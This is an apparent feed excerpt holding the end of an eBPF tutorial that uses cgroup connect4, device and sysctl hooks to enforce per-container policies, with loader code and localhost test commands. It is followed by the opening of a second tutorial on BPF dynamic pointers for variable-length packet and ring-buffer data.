        &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;rodata&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;blocked_tcp_dport&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;__u16&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;block_port&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;dev_major&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="n"&gt;dev_minor&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;rodata&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;blocked_dev_major&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;dev_major&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;rodata&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;blocked_dev_minor&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;dev_minor&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;deny_sysctl&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;snprintf&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;rodata&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;denied_sysctl_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                 &lt;span class="n"&gt;SYSCTL_NAME_LEN&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"%s"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;deny_sysctl&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Load BPF programs into kernel */&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;cgroup_guard_bpf__load&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;fprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"cgroup_guard_bpf__load() failed: %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;goto&lt;/span&gt; &lt;span class="n"&gt;cleanup&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Attach programs to cgroup */&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_link&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;link_connect&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_program__attach_cgroup&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;progs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;cg_connect4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cg_fd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_link&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;link_dev&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_program__attach_cgroup&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;progs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;cg_dev&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cg_fd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_link&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;link_sysctl&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_program__attach_cgroup&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;progs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;cg_sysctl&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cg_fd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Setup ring buffer for events */&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;ring_buffer&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ring_buffer__new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_map__fd&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;maps&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;events&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
                                              &lt;span class="n"&gt;handle_event&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Attached to cgroup: %s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cgroup_path&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Config: block_port=%d, deny_device=%d:%d, deny_sysctl_read=%s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
           &lt;span class="n"&gt;block_port&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dev_major&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dev_minor&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;deny_sysctl&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="n"&gt;deny_sysctl&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s"&gt;"(none)"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Main event loop */&lt;/span&gt;
    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;exiting&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ring_buffer__poll&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;200&lt;/span&gt; &lt;span class="cm"&gt;/* ms */&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;EINTR&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;ring_buffer__free&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="nl"&gt;cleanup:&lt;/span&gt;
    &lt;span class="n"&gt;bpf_link__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;link_sysctl&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;bpf_link__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;link_dev&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;bpf_link__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;link_connect&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;cgroup_guard_bpf__destroy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;close&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cg_fd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Understanding the Userspace Code
&lt;/h4&gt;

&lt;p&gt;The userspace loader's core job is to attach BPF programs to the specified cgroup, then continuously poll the ringbuf to print denied events.&lt;/p&gt;

&lt;p&gt;The program first uses &lt;code&gt;getopt_long&lt;/code&gt; to parse command-line arguments, getting the cgroup path and three policy configurations. Then it uses &lt;code&gt;open()&lt;/code&gt; with &lt;code&gt;O_RDONLY | O_DIRECTORY&lt;/code&gt; to open the cgroup directory and get a file descriptor. This fd is the attach target—cgroup eBPF programs are attached to cgroup directories.&lt;/p&gt;

&lt;p&gt;Next comes the standard skeleton workflow: &lt;code&gt;open()&lt;/code&gt; opens the BPF object, set &lt;code&gt;.rodata&lt;/code&gt; configuration, then &lt;code&gt;load()&lt;/code&gt; loads it into the kernel. Note that configuration must be set before load—after load, &lt;code&gt;.rodata&lt;/code&gt; becomes read-only.&lt;/p&gt;

&lt;p&gt;Attaching uses &lt;code&gt;bpf_program__attach_cgroup(prog, cg_fd)&lt;/code&gt; to attach each BPF program to the cgroup. Here we attach three programs: connect4, dev, and sysctl. After successful attachment, all processes in this cgroup will have their relevant operations go through these BPF programs.&lt;/p&gt;

&lt;p&gt;Finally, the event loop. &lt;code&gt;ring_buffer__poll()&lt;/code&gt; polls the ringbuf, calling the &lt;code&gt;handle_event&lt;/code&gt; callback whenever events arrive to print them. This lets you see which operations are being denied in real-time.&lt;/p&gt;

&lt;h2&gt;
  
  
  Building
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;src/cgroup
make
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Running
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Terminal A: Start the loader
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Block: TCP port 9090, /dev/null (1:3), reading kernel/hostname&lt;/span&gt;
&lt;span class="nb"&gt;sudo&lt;/span&gt; ./cgroup_guard &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--cgroup&lt;/span&gt; /sys/fs/cgroup/ebpf_demo &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--block-port&lt;/span&gt; 9090 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--deny-device&lt;/span&gt; 1:3 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--deny-sysctl&lt;/span&gt; kernel/hostname
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You should see:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Attached to cgroup: /sys/fs/cgroup/ebpf_demo
Config: block_port=9090, deny_device=1:3, deny_sysctl_read=kernel/hostname
Press Ctrl-C to stop.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Terminal B: Start test servers (outside cgroup)
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Start two HTTP servers&lt;/span&gt;
python3 &lt;span class="nt"&gt;-m&lt;/span&gt; http.server 8080 &lt;span class="nt"&gt;--bind&lt;/span&gt; 127.0.0.1 &amp;amp;
python3 &lt;span class="nt"&gt;-m&lt;/span&gt; http.server 9090 &lt;span class="nt"&gt;--bind&lt;/span&gt; 127.0.0.1 &amp;amp;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Terminal C: Test from within the cgroup
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;bash &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s1"&gt;'
echo $$ &amp;gt; /sys/fs/cgroup/ebpf_demo/cgroup.procs

echo "== TCP test =="
curl -s http://127.0.0.1:8080 &amp;gt;/dev/null &amp;amp;&amp;amp; echo "8080 OK"
curl -s http://127.0.0.1:9090 &amp;gt;/dev/null &amp;amp;&amp;amp; echo "9090 OK (unexpected)" || echo "9090 BLOCKED (expected)"

echo
echo "== Device test =="
cat /dev/null &amp;amp;&amp;amp; echo "/dev/null OK (unexpected)" || echo "/dev/null BLOCKED (expected)"

echo
echo "== Sysctl test =="
cat /proc/sys/kernel/hostname &amp;amp;&amp;amp; echo "sysctl read OK (unexpected)" || echo "sysctl read BLOCKED (expected)"
'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Expected output:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;8080 OK&lt;/code&gt; - Port 8080 is allowed&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;9090 BLOCKED (expected)&lt;/code&gt; - Port 9090 is blocked&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/dev/null BLOCKED (expected)&lt;/code&gt; - Device 1:3 is blocked&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;sysctl read BLOCKED (expected)&lt;/code&gt; - Reading kernel/hostname is blocked&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Terminal A output (events)
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[DENY connect4] pid=12345 comm=curl daddr=127.0.0.1 dport=9090 proto=6
[DENY device]   pid=12346 comm=cat major=1 minor=3 access_type=0x...
[DENY sysctl]   pid=12347 comm=cat write=0 name=kernel/hostname
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  One-click Test
&lt;/h2&gt;

&lt;p&gt;We provide a test script that automatically compiles, starts servers, runs tests, and cleans up:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./test.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Verifying with bpftool
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;bpftool cgroup tree /sys/fs/cgroup/ebpf_demo
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  When to Use cgroup eBPF
&lt;/h2&gt;

&lt;p&gt;Choosing the right technology depends on your control granularity requirements.&lt;/p&gt;

&lt;p&gt;cgroup eBPF's control granularity is &lt;strong&gt;process groups&lt;/strong&gt;—put processes in a cgroup, attach a BPF program, and the policy applies to that group. This is perfect for container scenarios: each container is a cgroup, and you can set different network policies, device permissions, and sysctl access rules for different containers. When a process leaves the cgroup, the policy automatically stops applying—no manual cleanup needed.&lt;/p&gt;

&lt;p&gt;XDP and tc's control granularity is &lt;strong&gt;network interfaces&lt;/strong&gt;. They handle all traffic passing through a specific NIC, regardless of which process it comes from. If you need high-performance packet processing, DDoS protection, or load balancing, XDP/tc are better choices. But if you want "only allow container A to access port 80, while container B can access any port," XDP/tc become inconvenient.&lt;/p&gt;

&lt;p&gt;seccomp-BPF's control granularity is &lt;strong&gt;individual processes&lt;/strong&gt;. It filters system calls, such as preventing a process from calling &lt;code&gt;fork&lt;/code&gt;, &lt;code&gt;exec&lt;/code&gt;, or &lt;code&gt;socket&lt;/code&gt;. seccomp is lower-level and suitable for process sandboxing. But it can't control network destination addresses or device major:minor—these higher-level semantics.&lt;/p&gt;

&lt;p&gt;Traditional iptables/nftables are &lt;strong&gt;global&lt;/strong&gt;. Rules you configure apply to all processes on the entire system—there's no way to say "this rule only affects container A."&lt;/p&gt;

&lt;p&gt;In summary: if you need per-container/process-group policies, want to control network, devices, and sysctls together, and want policies to automatically follow process lifecycles, cgroup eBPF is the right choice.&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;cgroup eBPF solves the problem of fine-grained control that traditional global policies can't achieve by binding policies to process groups. This tutorial demonstrated three commonly used cgroup hooks:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cgroup/connect4&lt;/code&gt;&lt;/strong&gt;: Filter destination ports at TCP connection time, blocking disallowed outbound connections&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cgroup/dev&lt;/code&gt;&lt;/strong&gt;: Check major:minor at device access time, restricting reads/writes to specific devices&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;cgroup/sysctl&lt;/code&gt;&lt;/strong&gt;: Check names at sysctl read/write time, preventing sensitive configuration leaks or tampering&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This "policy guard" pattern can be extended to production use cases: container network policies (similar to Kubernetes NetworkPolicy), device isolation (GPU/TPU exclusive access), security sandboxes (restricting system information access). With ringbuf event reporting, you can also implement policy auditing and alerting.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;If you want to learn more about eBPF, check out our tutorial repository at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt; or visit our website at &lt;a href="https://eunomia.dev/tutorials/" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Kernel docs:&lt;/strong&gt; &lt;a href="https://docs.kernel.org/bpf/libbpf/program_types.html" rel="noopener noreferrer"&gt;libbpf program types&lt;/a&gt; - all cgroup-related section names&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;eBPF docs:&lt;/strong&gt; &lt;a href="https://docs.ebpf.io/linux/program-type/BPF_PROG_TYPE_CGROUP_SOCK_ADDR/" rel="noopener noreferrer"&gt;CGROUP_SOCK_ADDR&lt;/a&gt; - socket address hooks explained&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;eBPF docs:&lt;/strong&gt; &lt;a href="https://docs.ebpf.io/linux/program-type/BPF_PROG_TYPE_CGROUP_DEVICE/" rel="noopener noreferrer"&gt;CGROUP_DEVICE&lt;/a&gt; - device access control explained&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;eBPF docs:&lt;/strong&gt; &lt;a href="https://docs.ebpf.io/linux/program-type/BPF_PROG_TYPE_CGROUP_SYSCTL/" rel="noopener noreferrer"&gt;CGROUP_SYSCTL&lt;/a&gt; - sysctl access control explained&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tutorial repository:&lt;/strong&gt; &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/cgroup" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/cgroup&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Full source code is available in the tutorial repository. Requires Linux kernel 4.10+ (cgroup v2) and libbpf.&lt;/p&gt;

</description>
      <category>ebpf</category>
      <category>cgroup</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>eBPF Tutorial by Example: BPF Dynamic Pointers for Variable-Length Data</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 17 Feb 2026 07:43:38 +0000</pubDate>
      <link>https://forem.com/yunwei37/ebpf-tutorial-by-example-bpf-dynamic-pointers-for-variable-length-data-cj2</link>
      <guid>https://forem.com/yunwei37/ebpf-tutorial-by-example-bpf-dynamic-pointers-for-variable-length-data-cj2</guid>
      <description>&lt;p&gt;Ever written an eBPF packet parser and struggled with those verbose &lt;code&gt;data_end&lt;/code&gt; bounds checks that the verifier still rejects? Or tried to send variable-length events through ring buffers only to find yourself locked into fixed-size structures? Traditional eBPF development forces you to prove memory safety statically at compile time, which becomes painful when dealing with runtime-determined sizes like packet lengths or user-configurable snapshot lengths.&lt;/p&gt;

&lt;p&gt;This is what &lt;strong&gt;BPF dynptrs&lt;/strong&gt; (dynamic pointers) solve. Introduced gradually from Linux v5.19, dynptrs provide a verifier-friendly way to work with variable-length data by shifting some bounds checking from compile-time static analysis to runtime validation. In this tutorial, we'll build a TC ingress program that uses &lt;strong&gt;skb dynptrs&lt;/strong&gt; to parse TCP packets safely and &lt;strong&gt;ringbuf dynptrs&lt;/strong&gt; to output variable-length events containing configurable payload snapshots.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The complete source code: &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/dynptr" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/dynptr&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Introduction to BPF Dynamic Pointers
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: When Static Verification Isn't Enough
&lt;/h3&gt;

&lt;p&gt;The eBPF verifier's core mission is proving memory safety at load time. Every pointer dereference must be bounded, every array access must be within limits. This works beautifully for simple cases, but becomes a struggle when sizes are determined at runtime.&lt;/p&gt;

&lt;p&gt;Consider parsing a packet where the IP header length comes from a 4-bit field, or reading user-configurable amounts of TCP payload. The classic approach requires extensive bounds checking with &lt;code&gt;data_end&lt;/code&gt; comparisons, and even correctly written code sometimes fails verification because the verifier cannot trace all possible paths. When working with non-linear skb data (paged buffers), the situation gets worse since that data isn't directly accessible through &lt;code&gt;ctx-&amp;gt;data&lt;/code&gt; at all.&lt;/p&gt;

&lt;p&gt;Variable-length output presents similar challenges. The traditional &lt;code&gt;bpf_ringbuf_reserve()&lt;/code&gt; returns a raw pointer, but writing runtime-determined amounts of data to it makes the verifier uncomfortable because it cannot statically prove your writes stay within bounds.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Solution: Runtime-Checked Dynamic Pointers
&lt;/h3&gt;

&lt;p&gt;Dynptrs introduce an opaque handle type that carries metadata about the underlying memory region including its bounds and type. You cannot dereference a dynptr directly since the verifier will reject such attempts. Instead, you must use helper functions or kfuncs that perform the appropriate safety checks.&lt;/p&gt;

&lt;p&gt;The key insight is that &lt;strong&gt;some of these checks happen at runtime rather than compile time&lt;/strong&gt;. Functions like &lt;code&gt;bpf_dynptr_read()&lt;/code&gt; and &lt;code&gt;bpf_dynptr_write()&lt;/code&gt; validate bounds when they execute and return errors on failure. Functions like &lt;code&gt;bpf_dynptr_slice()&lt;/code&gt; return NULL when the requested region cannot be accessed safely. This lets you express logic that would be unprovable statically while maintaining safety guarantees.&lt;/p&gt;

&lt;p&gt;For the verifier, dynptrs are tracked specially. They have lifecycle rules (some must be released), type constraints (skb dynptrs behave differently than local dynptrs), and the verifier ensures you follow these rules. The runtime checks are the verifier's way of delegating what it cannot prove statically.&lt;/p&gt;

&lt;h2&gt;
  
  
  Dynptr API Overview
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Helpers vs Kfuncs
&lt;/h3&gt;

&lt;p&gt;The dynptr ecosystem spans two categories of functions. &lt;strong&gt;Helper functions&lt;/strong&gt; are part of the stable UAPI and generally maintain backward compatibility. &lt;strong&gt;Kfuncs&lt;/strong&gt; (kernel functions) are internal kernel exports to BPF with no ABI stability guarantees, meaning they may change between kernel versions.&lt;/p&gt;

&lt;p&gt;For dynptrs, the foundational read/write operations are helpers, while newer features like skb dynptrs and slicing are kfuncs. This means some dynptr functionality requires newer kernels and you should verify availability before relying on specific features.&lt;/p&gt;

&lt;h3&gt;
  
  
  Creating Dynptrs
&lt;/h3&gt;

&lt;p&gt;There are several ways to create dynptrs depending on your data source. The &lt;code&gt;bpf_dynptr_from_mem()&lt;/code&gt; helper creates a dynptr from map values or global variables, useful for working with configuration data or scratch buffers. The &lt;code&gt;bpf_dynptr_from_skb()&lt;/code&gt; kfunc creates a dynptr from a socket buffer, enabling safe access to packet data including non-linear (paged) regions. For XDP programs, &lt;code&gt;bpf_dynptr_from_xdp()&lt;/code&gt; provides similar functionality.&lt;/p&gt;

